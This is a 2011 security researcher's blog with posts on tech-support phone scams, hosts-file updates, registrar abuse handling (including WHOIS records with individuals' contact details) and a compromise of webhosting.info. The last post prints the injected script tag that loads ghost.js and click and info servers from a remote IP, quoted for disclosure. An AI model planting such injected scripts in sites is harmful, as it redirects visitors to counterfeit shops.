Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday, 30 November 2011

Eset: Support-Scammer Tricks

Having been blogging this topic for quite a while, I figure this might be a good time to highlight some of the snippets of information that people have posted on some of those blogs (anonymized, of course). You might also be interested in a resource page I've started here at AVIEN.

One prospective victim instructed to connect via the Run window to www.support.me. This turns out to belong to logmein.com, the home of one of the (legitimate) remote access tools used by scammers to "fix" their victim's computer, install "better" antivirus or antispyware, and so on. (ammyy.com is another, apparently more favoured by scammers calling victims in the US.) If anyone goes as far as getting a box like this, it would be interesting to know what code they are instructed to enter, since this may help in tracking scam sites.


Read more

http://blog.eset.com/2011/11/30/support-scammer-tricks

References

PC Support Scam Resources
http://avien.net/blog/?page_id=790

Facebook Likes and cold-call scams
http://blog.eset.com/2011/11/09/facebook-likes-and-cold-call-scams

Microsoft Support Scam (again)
http://isc.sans.org/diary.html?storyid=10912

Info: Telephone scammers still coming to a phone near you!
http://hphosts.blogspot.com/2011/03/info-telephone-scammers-still-coming-to.html

Support Scams: Even More Personal
http://blog.eset.com/2010/12/16/support-scams-even-more-personal

Fake Support: the War Drags On
http://blog.eset.com/2010/11/18/fake-support-the-war-drags-on

Marketing Misusing ESET’s Name
http://blog.eset.com/2010/06/23/marketing-misusing-esets-name

techonsupport.com, click4rescue.com, pcrescueworld.com: SupportOnClick revisited
http://hphosts.blogspot.com/2009/12/techonsupportcom-click4rescuecom.html

SupportOnClick: Phoned by Malwarebytes? BigPond? Anyone else?

http://hphosts.blogspot.com/2009/07/supportonclick-phoned-by-malwarebytes.html

SupportOnClick Update
http://hphosts.blogspot.com/2009/04/supportonclick-update.html

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

Fake tech support call scam - prefetch virus logmein123.com
http://www.digitaltoast.co.uk/fake-tech-support-call-scam-prefetch-virus-logmein123com

New scam - They call you by phone!
http://www.malwarebytes.org/forums/index.php?showtopic=11156

Staffordshire Council - Telephone computer support warning (PDF)
http://wayback.archive.org/web/*/http://www.staffordshire.gov.uk/NR/rdonlyres/6997DBB0-E31E-4AFB-A886-C9DDEE114204/90090/*

Cold call scam warns of virus infection
http://www.h-online.com/security/Cold-call-scam-warns-of-virus-infection--/news/112893

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

Monday, 21 November 2011

hpHOSTS - UPDATED November 21st, 2011

The hpHOSTS Hosts file has been updated. There is now a total of 216,044 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 21/11/2011 18:30
  2. Last Verified: 21/11/2011 19:00
Download hpHosts now!
http://hosts-file.net/?s=Download

Tuesday, 15 November 2011

up-yours.com - Here we go again

I thought I'd made this clear, but apparently not. I got an e-mail earlier, from a RoadRunner IP (residential US ISP), using an @up-yours.com address.

There's two problems here however;

1. It's an invalid address, so can't reply
2. The e-mail houses a childish threat, without actually telling me what I did to deserve it

*********************************************************************
General
*********************************************************************
Ref: PI0076181149255
Reason for message: Feedback Notification
Sent from Server: mysteryfcm.co.uk
Date submitted: 16 November 2011
Time submitted: 00:26:37
Submitted by: 76.181.149.255

*********************************************************************
Details
*********************************************************************
Name: Up yours
E-mail: kiss-my-ass@up-yours.com
How did you find us?: Search engine
... Other: Not provided
Site navigation: Very difficult
Comments:

Your scam is soon to be exposed my friend.

Enjoy...

Sunday, 13 November 2011

Lavasoft gone dodgy?

According to a post at my favorite news site, it looks like Lavasoft' new owners are the infamous chaps behind the well known "Interactive Brands". Should've seen this coming really, given they de-listed the well known malware player, WhenU, some time ago - I know that was 6 years ago, but it can't just be a coincidence, especially given who the new owners are.

Anti-spyware company Lavasoft AB is now owned by a set of online entrepreneurs who have been linked with misleading websites.

The Montreal-based entrepreneurs, who purchased the company's assets in January, have previously been accused of selling the free versions of Lavasoft products to unwitting internet users as recently as 2007 via cyber-squatting sites.

Lavasoft, originally based in Sweden, was purchased by an investment fund called Solaria in January, but no other holdings can be found for Solaria. In fact, the only ties that Solaria has are to the founders of Upclick, an affiliate marketing company. The founders of this company have also founded companies that sold online porn, reskinned peer-to-peer filesharing software, and allegedly "skimmed" online sales, charging customers for software that they did not order.


http://www.theregister.co.uk/2011/11/11/lavasoft_has_new_owners/

Friday, 11 November 2011

Internet.bs still not accepting abuse reports

You may remember, in September I blogged about Internet.BS, well known as a bulletproof provider for domain registrations.

Sadly, neither Verisign nor ICANN have done anything, and Internet.bs are still refusing reports (I say refusing because whilst the error is a 450, they were notified months ago and it's still producing the same error, preventing reports going through), courtesy of the Gmail address their abuse@ address leads to (rinaudo@gmail.com).

Interesting tidbit for those interested - rinaudo@gmail.com has also been seen spamming.

http://www.stopforumspam.com/evidence/2423442 (login required to view it).

hxxp://www.8count.ca/forums//profile.php?mode=viewprofile&u=425970

What is curious, is looking at kookel.org (acts as a mirror for various Unix/Linux distributions), Marco Rinaudo seems to want to claim to be located in Panama, but with a US phone number.

Domain ID:D146864410-LROR
Domain Name:KOOKEL.ORG
Created On:24-May-2007 14:30:55 UTC
Last Updated On:25-May-2011 11:00:04 UTC
Expiration Date:24-May-2012 14:30:55 UTC
Sponsoring Registrar:Internet.bs Corp. (R1601-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:eu348378bbfeb655
Registrant Name:Marco Rinaudo
Registrant Street1:Av. El Penon #12
Registrant Street2:
Registrant Street3:
Registrant City:Panama
Registrant State/Province:
Registrant Postal Code:00000
Registrant Country:PA
Registrant Phone:+1.23456789
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:rinaudo@gmail.com
Admin ID:eu348378bbeda205
Admin Name:Marco Rinaudo
Admin Street1:Av. El Penon #12
Admin Street2:
Admin Street3:
Admin City:Panama
Admin State/Province:
Admin Postal Code:00000
Admin Country:PA
Admin Phone:+1.23456789
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:rinaudo@gmail.com
Tech ID:eu348378bbdaad56
Tech Name:Marco Rinaudo
Tech Street1:Av. El Penon #12
Tech Street2:
Tech Street3:
Tech City:Panama
Tech State/Province:
Tech Postal Code:00000
Tech Country:PA
Tech Phone:+1.23456789
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:rinaudo@gmail.com
Name Server:DNS1.GOLDCAKE.COM
Name Server:DNS2.GOLDCAKE.COM
DNSSEC:Unsigned


goldcake.com is also one of Marco's websites;

Date Registered: 2002-9-9
Date Modified: 2011-9-3
Expiry Date: 2012-9-9

DNS1: dns3.goldcake.com
DNS2: dns1.goldcake.com
DNS3: dns2.goldcake.com

Registrant
Marco Rinaudo marco (at) rinaudo dot com
Av. El Penon #12
- Panama
Panama
Tel: +1.6463831418

Administrative Contact
Marco Rinaudo marco (at) rinaudo dot com
Av. El Penon #12
- Panama
Panama
Tel: +1.6463831418

Technical Contact
Marco Rinaudo marco (at) rinaudo dot com
Av. El Penon #12
- Panama
Panama
Tel: +1.6463831418

Registrar: Internet.bs Corp.


References

Dear Internet.BS
hphosts.blogspot.com/2011/09/dear-internetbs.html

Wednesday, 9 November 2011

Facebook Likes and cold-call scams

Following an article I wrote recently for SC Magazine, Martijn Grooten of Virus Bulletin, who shares my interest in and dislike of support desk scams, contacted me about the web site associated with eFIX, a company claiming to offer online technical support. He and I, along with Steven Burn, who has a great deal of experience of working in this area, have been able to dig out some interesting info on a slightly different aspect of flaky support desk operations.

eFIX’s web page lists an office in Glasgow under the name eFIX Ltd, at 8901 Marmora Road, Glasgow, D04 89GR. However, a search at Companies House, while it did turn up several entries with somewhat similar names, didn’t find one in Glasgow, and the address doesn’t ring true. The postcode is a fake, and we can’t find a Marmora road in Glasgow (let alone one long enough to hold nearly 9000 street addresses). In fact, the same address turns up in a great many other contexts (design consultancies, music, accountancy, even a buffet service), suggesting the use of some kind of template/boilerplate. It also suggests that it’s not only PC support companies that are suspiciously shy about their real whereabouts. Or else 8901 must be an awfully big building. Of course, it could be an accommodation address for multiple businesses, but that doesn’t explain why the street address itself is so elusive.


http://blog.eset.com/2011/11/09/facebook-likes-and-cold-call-scams

Tuesday, 1 November 2011

webhosting.info compromised

Look at the image on the left. See anything that shouldn't be there?

I'll give you a hint - it's got a black background.

I identified this whilst doing a routine enquiry on an IP housing a plethora of fake meds sites. I dropped a note to the sites owner and registrar, who informed me it most definitely should NOT be there.

The content in question, is;

<script type="text/javascript" src="http://122.182.1.154/ghost/ghost.js"></script>
<script>
infoServer="http://122.182.1.154/ghost/infoServer.php";
ghostServer="http://122.182.1.154/ghost/click.php";
initGhost() ;
</script>


The IP (122.182.1.154) belongs to Airtel customer, TELEMEDIA SERVICES;

inetnum: 122.182.0.0 - 122.182.127.255
netname: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: India
descr: Contact Person: Manas Kaul
descr: Email: dsl.nocmumbai@airtel.in
descr: Phone:022-40034191
descr: Date of allocation:22-Dec-08
admin-c: MUM1-AP
tech-c: MUM1-AP
country: IN
mnt-by: MAINT-IN-BBIL
mnt-lower: MAINT-IN-TELEMEDIA
mnt-routes: MAINT-IN-TELEMEDIA
status: ALLOCATED NON-PORTABLE
changed: dsl.nocmumbai@airtel.in 20081229
source: APNIC

route: 122.182.1.0/24
descr: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: INDIA
country: IN
origin: AS24560
mnt-by: MAINT-IN-TELEMEDIA
changed: dsl.nocmumbai@airtel.in 20090331
source: APNIC

route: 122.182.1.0/24
descr: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: INDIA
country: IN
origin: AS45514
mnt-by: MAINT-IN-TELEMEDIA
changed: dsl.nocmumbai@airtel.in 20081229
source: APNIC

person: Network Administrator for ABTS MUM
address: ABTS
address: 6th Floor, Interface, Bldg No 7, Link Road,Malad (W),
address: Mumbai,Maharashtra
country: IN
phone: +91-9967667198
e-mail: manas.kaul@airtel.in
nic-hdl: MUM1-AP
remarks: -----------------------------
remarks: Send abuse reports to
remarks: manas.kaul@airtel.in
remarks: -----------------------------
mnt-by: MAINT-IN-TELEMEDIA
changed: manas.kaul@airtel.in 20080725
source: APNIC


The script itself, loads content that leads to search.keywordblocks.com (aka searchwe.com), which then leads unsuspecting victims to counterfeit sites such as jewelly.co.uk.

The webhosting.info server admin has been notified by the registrar, so it should be cleaned up and secured shortly.